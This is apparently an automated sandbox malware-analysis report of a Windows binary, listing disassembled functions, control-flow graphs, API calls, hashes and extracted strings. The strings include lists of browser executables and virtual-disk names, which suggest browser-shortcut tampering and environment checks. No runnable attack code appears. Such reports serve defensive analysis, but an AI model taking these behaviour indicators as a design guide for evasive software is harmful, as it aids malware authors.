                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$Setup$Device$EnterInit_thread_footerInitializeLeavePropertyRegistry$ClassDestroyDevsInfoList
                                                                                                                                                                                                          • String ID: A$Info$List$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$bxp scsi$ccboot$deepin$evsW$hangzhou changjin$mzd.live$nmenu$nxd xp$richdisk$ter$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$vdiskbus$vhd cms$vice$vnd scsi
                                                                                                                                                                                                          • API String ID: 2279208414-2458627454
                                                                                                                                                                                                          • Opcode ID: a345448e2b9446b60aeca82d63a069c040a82c70df20a837f092cf8f5c6a21b0
                                                                                                                                                                                                          • Instruction ID: 46e34079cb28ee3dac007b19e727f48e6ac5ef881adbdfc1ca7c33a713eff10d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a345448e2b9446b60aeca82d63a069c040a82c70df20a837f092cf8f5c6a21b0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF12427091025A9FDB10DF64DD41BA9BBF8BF19304F00819AE45CE7251EBB4AE85CFA1
                                                                                                                                                                                                          Function 0040F7C0 Relevance: 62.3, APIs: 10, Strings: 25, Instructions: 1003registrytimeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1097 40f7c0-40f918 call 40b650 * 3 call 411890 call 40b7a0 1108 40f942-40f951 call 411ac0 1097->1108 1109 40f91a-40f940 1097->1109 1111 40f957-40f972 1108->1111 1109->1111 1112 40f974-40f989 1111->1112 1113 40f9a9-40f9d0 1111->1113 1115 40f98b-40f999 1112->1115 1116 40f99f-40f9a6 call 513d74 1112->1116 1117 40f9d2-40f9e7 1113->1117 1118 40fa07-40fa4b call 40b650 1113->1118 1115->1116 1120 4107ca-4107f2 call 51b528 1115->1120 1116->1113 1121 40f9e9-40f9f7 1117->1121 1122 40f9fd-40fa04 call 513d74 1117->1122 1130 40fa79-40fa85 call 411ac0 1118->1130 1131 40fa4d-40fa77 1118->1131 1121->1122 1122->1118 1133 40fa88-40fa8f 1130->1133 1131->1133 1135 40fa91-40faa3 1133->1135 1136 40fac3-40fb16 call 40b650 1133->1136 1137 40faa5-40fab3 1135->1137 1138 40fab9-40fac0 call 513d74 1135->1138 1143 40fb53-40fb62 call 411ac0 1136->1143 1144 40fb18-40fb51 1136->1144 1137->1138 1138->1136 1146 40fb68-40fb6f 1143->1146 1144->1146 1147 40fb71-40fb86 1146->1147 1148 40fba6-40fbf0 call 40b650 1146->1148 1150 40fb88-40fb96 1147->1150 1151 40fb9c-40fba3 call 513d74 1147->1151 1156 40fbf2-40fc1c 1148->1156 1157 40fc1e-40fc2a call 411ac0 1148->1157 1150->1151 1151->1148 1158 40fc2d-40fc34 1156->1158 1157->1158 1161 40fc36-40fc48 1158->1161 1162 40fc68-40fcbb call 40b650 1158->1162 1164 40fc4a-40fc58 1161->1164 1165 40fc5e-40fc65 call 513d74 1161->1165 1169 40fcf8-40fd07 call 411ac0 1162->1169 1170 40fcbd-40fcf6 1162->1170 1164->1165 1165->1162 1172 40fd0d-40fd14 1169->1172 1170->1172 1174 40fd16-40fd2b 1172->1174 1175 40fd4b-40fd95 call 40b650 1172->1175 1177 40fd41-40fd48 call 513d74 1174->1177 1178 40fd2d-40fd3b 1174->1178 1181 40fdc3-40fdcf call 411ac0 1175->1181 1182 40fd97-40fdc1 1175->1182 1177->1175 1178->1177 1184 40fdd2-40fdd9 1181->1184 1182->1184 1187 40fddb-40fded 1184->1187 1188 40fe0d-40fe60 call 40b650 1184->1188 1189 40fe03-40fe0a call 513d74 1187->1189 1190 40fdef-40fdfd 1187->1190 1195 40fe62-40fe9b 1188->1195 1196 40fe9d-40feac call 411ac0 1188->1196 1189->1188 1190->1189 1198 40feb2-40feb9 1195->1198 1196->1198 1200 40fef0-40ff3a call 40b650 1198->1200 1201 40febb-40fed0 1198->1201 1208 40ff67-40ff6e call 411ac0 1200->1208 1209 40ff3c-40ff65 1200->1209 1202 40fed2-40fee0 1201->1202 1203 40fee6-40feed call 513d74 1201->1203 1202->1203 1203->1200 1210 40ff73-40ffcc call 408a10 call 40b650 1208->1210 1209->1210 1216 410008-410012 call 411ac0 1210->1216 1217 40ffce-410006 1210->1217 1218 410017-410061 call 408a10 call 40b650 1216->1218 1217->1218 1224 410063-41008c 1218->1224 1225 41008e-410095 call 411ac0 1218->1225 1226 41009a-4100f3 call 408a10 call 40b650 1224->1226 1225->1226 1232 4100f5-41012d 1226->1232 1233 41012f-410139 call 411ac0 1226->1233 1234 41013e-410188 call 408a10 call 40b650 1232->1234 1233->1234 1240 4101b5-4101bc call 411ac0 1234->1240 1241 41018a-4101b3 1234->1241 1242 4101c1-41021a call 408a10 call 40b650 1240->1242 1241->1242 1248 410256-410260 call 411ac0 1242->1248 1249 41021c-410254 1242->1249 1250 410265-4102af call 408a10 call 40b650 1248->1250 1249->1250 1256 4102b1-4102da 1250->1256 1257 4102dc-4102e3 call 411ac0 1250->1257 1258 4102e8-410341 call 408a10 call 40b650 1256->1258 1257->1258 1264 410343-41037b 1258->1264 1265 41037d-410387 call 411ac0 1258->1265 1266 41038c-4103d6 call 408a10 call 40b650 1264->1266 1265->1266 1272 410403-41040a call 411ac0 1266->1272 1273 4103d8-410401 1266->1273 1274 41040f-410468 call 408a10 call 40b650 1272->1274 1273->1274 1280 4104a4-4104ae call 411ac0 1274->1280 1281 41046a-4104a2 1274->1281 1282 4104b3-4105f2 call 408a10 call 408b10 call 4112d0 call 408a10 call 408b10 call 4112d0 call 408a10 call 4089b0 * 3 call 411890 call 411950 call 4112d0 call 408a10 * 2 call 408b10 call 4112d0 call 408a10 call 410800 * 2 call 411680 1280->1282 1281->1282 1326 4105f8-41071a call 5165e0 GetModuleHandleW RegisterClassExW GetModuleHandleW CreateWindowExW call 513ac7 call 4045d0 call 46a740 call 481f30 call 411640 call 4089a0 call 482060 SetTimer 1282->1326 1327 41071c-41077b call 403930 call 40ca00 call 408cf0 call 408bd0 CreateEventA SetEvent call 408cf0 1282->1327 1344 410780-4107c9 call 408a10 * 3 call 513805 1326->1344 1327->1344
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0041052C
                                                                                                                                                                                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00410539
                                                                                                                                                                                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00410546
                                                                                                                                                                                                            • Part of subcall function 00410800: GetProcAddress.KERNEL32 ref: 00410886
                                                                                                                                                                                                            • Part of subcall function 00410800: GetProcAddress.KERNEL32(?,?), ref: 004108D9
                                                                                                                                                                                                            • Part of subcall function 00410800: SHGetPathFromIDListW.SHELL32(?,?,?,?), ref: 004108EE
                                                                                                                                                                                                            • Part of subcall function 00410800: FindFirstFileW.KERNEL32(?,?), ref: 00410961
                                                                                                                                                                                                            • Part of subcall function 00410800: CoInitialize.OLE32(00000000), ref: 004109E9
                                                                                                                                                                                                            • Part of subcall function 00410800: CoCreateInstance.COMBASE(00564920,00000000,00000001,005648E0,?), ref: 00410A18
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,SLBrowser.exe,00000000,?,?), ref: 0041061D
                                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0041063D
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 00410647
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,UJNGRFSBFJWOKS,00000000,86CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410664
                                                                                                                                                                                                            • Part of subcall function 00481F30: GetClientRect.USER32(00000000), ref: 00481F69
                                                                                                                                                                                                          • SetTimer.USER32(00000000,00007E43,00001770,00000000), ref: 0041070E
                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?), ref: 00410764
                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0041076B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateSimpleString::operator=$AddressEventHandleModuleProc$ClassClientFileFindFirstFromInitializeInstanceListPathRectRegisterTimerWindow
                                                                                                                                                                                                          • String ID: 2345Explorer.exe$360chrome.exe$360se.exe$Maxthon010203.11exe$MxStart010203.11exe$Opera\launcher010203.11exe$QQBrowser.exe$SLBrowser.exe$Tango3010203.11exe$TaoBrowser010203.11exe$TheWorld010203.11exe$UCBrowser.exe$UJNGRFSBFJWOKS$baiduBrowser010203.11exe$chrome.exe$dge.$exe$firefox.exe$iexp$liebao010203.11exe$lore.$mse$qianying010203.11exe$shortcut$sogouexplorer.exe
                                                                                                                                                                                                          • API String ID: 4163093286-2938698853
                                                                                                                                                                                                          • Opcode ID: 40b20a862301f5aea954fdb987e9bbb8bda5afa14a7635b0de9bb88c0959dd8d
                                                                                                                                                                                                          • Instruction ID: 23ebb9a8916a565e2745ce6d40a011bcf8e2e70713e5ae40f8ab8740941a9c4c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40b20a862301f5aea954fdb987e9bbb8bda5afa14a7635b0de9bb88c0959dd8d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85A27E70D05358DAEB20DF64C945BDEBBB0BF51308F10869ED049BB292DB786A84CF55
                                                                                                                                                                                                          Function 0049A480 Relevance: 57.1, APIs: 29, Strings: 3, Instructions: 1065windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059699C), ref: 0049A59C
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059699C), ref: 0049A5F0
                                                                                                                                                                                                          • GetCapture.USER32 ref: 0049A60E
                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?,?,EFE0703F,?,?), ref: 0049A72C
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0049AA29
                                                                                                                                                                                                          • BeginPaint.USER32(?,?,EFE0703F,?,?), ref: 0049ACF9
                                                                                                                                                                                                          • EndPaint.USER32(?,?,00000000,?,?), ref: 0049AD0F
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0049ADAF
                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0049ADB6
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0049ADF3
                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0049ADFA
                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0049AE2F
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000112,?,?), ref: 0049AE71
                                                                                                                                                                                                          • 73A0A570.USER32(?,?,?), ref: 0049AEE7
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0049AF35
                                                                                                                                                                                                          • RemovePropW.USER32(?,SYSPLUGIN), ref: 0049AF62
                                                                                                                                                                                                            • Part of subcall function 00496970: DeleteObject.GDI32(?), ref: 004969AB
                                                                                                                                                                                                            • Part of subcall function 00496970: DeleteObject.GDI32(?), ref: 004969BC
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059699C), ref: 0049B6D3
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0049B6E8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Cursor$CriticalSection$DeleteLoadMessageObjectPaintSend$A570BeginCallCaptureClientEnterInit_thread_footerInitializeInvalidateLeaveProcPropRectRemoveScreenWindow
                                                                                                                                                                                                          • String ID: DownLoadFrame_splash$SYSPLUGIN$dulibMenuClass
                                                                                                                                                                                                          • API String ID: 273701605-2935986418
                                                                                                                                                                                                          • Opcode ID: c4c6417015f089dce10c0349ab81e108fad9e456b07fda7e27c49860a080dd04
                                                                                                                                                                                                          • Instruction ID: f084a153acb2df5a4f5caecbd66f76ff173d37e4b7a2dc1f39f52cb0512712aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c6417015f089dce10c0349ab81e108fad9e456b07fda7e27c49860a080dd04
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E924130A00215AFDF249F54DD89FAEBBB8FF45304F1401AAE549A7251DB34AD90CF96
                                                                                                                                                                                                          Function 004234B0 Relevance: 37.1, APIs: 11, Strings: 10, Instructions: 340libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2194 4234b0-4234d4 2195 4234da-4234ec call 408050 2194->2195 2196 4238a9-4238bc call 513805 2194->2196 2201 423510-423524 StrRChrIA call 408050 2195->2201 2202 4234ee-42350d GetProcAddress 2195->2202 2204 423529-423532 2201->2204 2202->2201 2205 423534-42355a GetProcAddress 2204->2205 2206 42355c-42356b 2204->2206 2205->2206 2208 423578 2206->2208 2209 42356d-42356f 2206->2209 2211 42357a-423588 call 408050 2208->2211 2210 423571-423576 2209->2210 2209->2211 2210->2211 2214 4235b2-4235d4 call 408050 2211->2214 2215 42358a-4235b0 GetProcAddress 2211->2215 2219 4235d6-4235fc GetProcAddress 2214->2219 2220 4235fe-423610 2214->2220 2215->2214 2219->2220 2222 423612-423614 2220->2222 2223 42361d 2220->2223 2224 423616-42361b 2222->2224 2225 42361f-423621 2222->2225 2223->2225 2224->2225 2226 423881-423883 2225->2226 2227 423627-423629 2225->2227 2226->2196 2230 423885-4238a6 call 513805 2226->2230 2228 423633-42363f call 408050 2227->2228 2229 42362b-42362d 2227->2229 2235 423663-42368f call 408050 2228->2235 2236 423641-423660 GetProcAddress 2228->2236 2229->2228 2229->2230 2240 423691-4236b7 GetProcAddress 2235->2240 2241 4236b9-4236c8 2235->2241 2236->2235 2240->2241 2243 4236d5-4236d7 2241->2243 2244 4236ca-4236cc 2241->2244 2243->2196 2247 4236dd 2243->2247 2245 4236ce-4236d3 2244->2245 2246 4236df-4236ed call 408050 2244->2246 2245->2246 2250 423717-423738 call 408050 2246->2250 2251 4236ef-423715 GetProcAddress 2246->2251 2247->2246 2255 423762-423773 2250->2255 2256 42373a-423760 GetProcAddress 2250->2256 2251->2250 2258 423780 2255->2258 2259 423775-423777 2255->2259 2256->2255 2260 423782-423790 call 408050 2258->2260 2259->2260 2261 423779-42377e 2259->2261 2264 423792-4237b8 GetProcAddress 2260->2264 2265 4237ba-4237de call 408050 2260->2265 2261->2260 2264->2265 2269 4237e0-42380a GetProcAddress 2265->2269 2270 42380c-42381d 2265->2270 2269->2270 2272 42382a 2270->2272 2273 42381f-423821 2270->2273 2275 42382c-42382e 2272->2275 2274 423823-423828 2273->2274 2273->2275 2274->2275 2276 423830-423832 2275->2276 2277 423867-423869 2275->2277 2279 423834-42384c call 513805 2276->2279 2280 42384f-423864 call 513805 2276->2280 2277->2196 2278 42386b-42387e call 513805 2277->2278
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0042350B
                                                                                                                                                                                                          • StrRChrIA.SHLWAPI(?,00000000,0000005F,00000000,00000000,00000000), ref: 00423518
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrR), ref: 00423551
                                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 004235A7
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,StrR), ref: 004235F3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0042365E
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004236AE
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0042370C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00423757
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004237AF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004237FD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$EnterInit_thread_footerInitializeLeave
                                                                                                                                                                                                          • String ID: %40$%5F$%76$A$A$A$StrI$StrI$StrR$StrR
                                                                                                                                                                                                          • API String ID: 1506207541-333352116
                                                                                                                                                                                                          • Opcode ID: 81b81600f2cb593c77551468dad1d8a4abc8639d2d0a78a0ddebd3a08e9c92ef
                                                                                                                                                                                                          • Instruction ID: 48f97e0e5b0175d9a4ac7cb73ca2d921a8b35f7d8ba6d1705d3cbafb0d7e01cc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81b81600f2cb593c77551468dad1d8a4abc8639d2d0a78a0ddebd3a08e9c92ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DC190B1709311AFC314DF59D980A2BBBF4AF88304F41496EFA59C7350DB78D9048BAA
                                                                                                                                                                                                          Function 0044CE90 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 477COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2287 44ce90-44ced0 2288 44ced6 2287->2288 2289 44d0be-44d0c4 2287->2289 2290 44cedc-44cee1 2288->2290 2291 44d068-44d070 2288->2291 2292 44d31c-44d322 2289->2292 2293 44d0ca 2289->2293 2294 44cee7-44ceec 2290->2294 2295 44d042-44d04a 2290->2295 2300 44d594 2291->2300 2301 44d076-44d081 SetEvent 2291->2301 2296 44d4ee-44d4f4 2292->2296 2297 44d328 2292->2297 2298 44d0d0-44d0d9 2293->2298 2299 44d308-44d30a 2293->2299 2303 44cef2-44cef5 2294->2303 2304 44cfc3-44cfcb 2294->2304 2295->2300 2308 44d050-44d05b call 450310 2295->2308 2309 44d4f6-44d4fc 2296->2309 2310 44d52b-44d533 2296->2310 2305 44d4d6-44d4dd 2297->2305 2306 44d32e-44d335 2297->2306 2298->2300 2307 44d0df-44d0e6 2298->2307 2299->2300 2302 44d310-44d317 PostQuitMessage 2299->2302 2311 44d597-44d59c 2300->2311 2312 44d083-44d08b 2301->2312 2313 44d0aa-44d0b9 PostMessageW 2301->2313 2302->2300 2303->2300 2315 44cefb-44cf01 2303->2315 2304->2300 2314 44cfd1-44cfd7 2304->2314 2305->2300 2316 44d4e3-44d4e9 call 450080 2305->2316 2317 44d3fc-44d404 2306->2317 2318 44d33b-44d33e 2306->2318 2319 44d22c-44d234 2307->2319 2320 44d0ed-44d0f5 2307->2320 2321 44d1ed-44d1f7 2307->2321 2322 44d24f-44d257 2307->2322 2323 44d2d8-44d2e0 2307->2323 2324 44d209-44d211 2307->2324 2308->2300 2349 44d061-44d063 2308->2349 2309->2300 2326 44d502-44d509 2309->2326 2310->2300 2327 44d535-44d53b 2310->2327 2347 44d5a3-44d5be call 513805 2311->2347 2328 44d09c-44d0a0 call 4511c0 2312->2328 2329 44d08d-44d096 SetWindowTextA 2312->2329 2313->2300 2314->2300 2331 44cfdd-44cfe3 2314->2331 2332 44cf03-44cf08 call 4549e0 2315->2332 2333 44cf0d-44cf13 2315->2333 2316->2300 2317->2300 2338 44d40a-44d421 call 43be40 2317->2338 2343 44d340-44d343 2318->2343 2344 44d398-44d3a2 2318->2344 2319->2300 2348 44d23a-44d244 call 450310 2319->2348 2320->2300 2346 44d0fb-44d149 call 438b20 call 446140 call 41d430 2320->2346 2321->2311 2342 44d1fd-44d204 2321->2342 2322->2300 2330 44d25d-44d264 2322->2330 2323->2300 2337 44d2e6-44d2ed 2323->2337 2324->2300 2345 44d217-44d221 call 450310 2324->2345 2326->2300 2336 44d50f-44d515 2326->2336 2339 44d545-44d55d ShowWindow call 408180 2327->2339 2340 44d53d-44d543 2327->2340 2363 44d0a5 2328->2363 2329->2328 2351 44d284-44d2d3 call 41bf60 GetTickCount call 437d90 call 451470 2330->2351 2352 44d266-44d27a call 43be40 2330->2352 2353 44cfe5-44cfec 2331->2353 2354 44cff7-44cffa 2331->2354 2332->2300 2357 44cfa2-44cfab 2333->2357 2358 44cf19-44cf28 call 41bf60 2333->2358 2336->2349 2359 44d51b-44d51e 2336->2359 2337->2351 2360 44d2ef-44d303 call 43be40 2337->2360 2379 44d426-44d42e 2338->2379 2393 44d583 2339->2393 2394 44d55f-44d581 GetProcAddress 2339->2394 2340->2300 2340->2339 2342->2311 2343->2300 2364 44d349-44d350 2343->2364 2344->2349 2350 44d3a8-44d3b4 2344->2350 2345->2300 2396 44d227 2345->2396 2421 44d155 2346->2421 2422 44d14b-44d150 call 446140 call 41d9d0 2346->2422 2348->2300 2399 44d24a 2348->2399 2349->2347 2350->2349 2369 44d3ba-44d3bc 2350->2369 2351->2300 2352->2351 2353->2354 2371 44cfee-44cff5 2353->2371 2373 44cffc-44d01a GetTickCount 2354->2373 2374 44d01f-44d03d GetTickCount 2354->2374 2357->2311 2384 44cfb1-44cfbe KillTimer call 4546a0 2357->2384 2358->2300 2401 44cf2e-44cf35 2358->2401 2359->2349 2377 44d524-44d529 2359->2377 2360->2351 2363->2300 2364->2300 2381 44d356-44d358 2364->2381 2387 44d3c0-44d3d0 call 4908b0 2369->2387 2371->2349 2371->2354 2373->2300 2374->2300 2377->2347 2379->2300 2392 44d434-44d445 call 49c5e0 2379->2392 2381->2300 2395 44d35e-44d366 2381->2395 2384->2311 2429 44d3d2-44d3d7 2387->2429 2430 44d3d9-44d3df 2387->2430 2392->2300 2418 44d44b-44d467 call 43d6b0 2392->2418 2403 44d586-44d590 2393->2403 2394->2403 2404 44d388-44d393 call 513d74 2395->2404 2405 44d368-44d383 call 43fad0 2395->2405 2396->2347 2399->2347 2401->2300 2410 44cf3b-44cf4c call 49c5e0 2401->2410 2403->2300 2404->2300 2405->2404 2410->2300 2431 44cf52-44cf59 2410->2431 2439 44d469 2418->2439 2440 44d46b-44d482 2418->2440 2428 44d158 call 436530 2421->2428 2422->2421 2434 44d15d-44d18e call 4385c0 call 446140 call 467c10 2428->2434 2429->2430 2435 44d3e8-44d3f7 2429->2435 2430->2387 2436 44d3e1-44d3e3 2430->2436 2437 44cf75-44cf83 2431->2437 2438 44cf5b-44cf73 2431->2438 2463 44d193-44d1a8 PostQuitMessage 2434->2463 2435->2347 2436->2347 2449 44cf8d-44cf9d call 49de80 call 49ddf0 2437->2449 2438->2449 2439->2440 2450 44d484-44d496 2440->2450 2451 44d4b6-44d4d1 call 49ddf0 2440->2451 2449->2300 2455 44d4ac-44d4b3 call 513d74 2450->2455 2456 44d498-44d4a6 2450->2456 2451->2300 2455->2451 2456->2455 2460 44d5c6-44d5cb call 51b528 2456->2460 2467 44d1d6-44d1e8 2463->2467 2468 44d1aa-44d1b6 2463->2468 2467->2300 2470 44d1cc-44d1d3 call 513d74 2468->2470 2471 44d1b8-44d1c6 2468->2471 2470->2467 2471->2470 2472 44d5c1 call 51b528 2471->2472 2472->2460
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0044CFFC
                                                                                                                                                                                                          • SetEvent.KERNEL32(?,EFE0703F), ref: 0044D079
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0044D096
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CountEventTextTickWindow
                                                                                                                                                                                                          • String ID: 0$GWPGWPGWPNB$W$btn_openfile$jjjjjjh$jkj$jkj$main_text1$ttj
                                                                                                                                                                                                          • API String ID: 1892856236-1426361691
                                                                                                                                                                                                          • Opcode ID: f5b603520864e1c63cd1a3c1161cdd37d28df692521ced6fbbf9a146783235db
                                                                                                                                                                                                          • Instruction ID: 4db247760b552e3c20b62f4a37da0c28fdf706a323f357a3a0a9242cd321078b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5b603520864e1c63cd1a3c1161cdd37d28df692521ced6fbbf9a146783235db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2302D370A00205ABFF14DF68CD89BAE77B5AF08308F14017BE9059B296DB78DD44DB69
                                                                                                                                                                                                          Function 004996E0 Relevance: 31.8, APIs: 21, Instructions: 273timeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

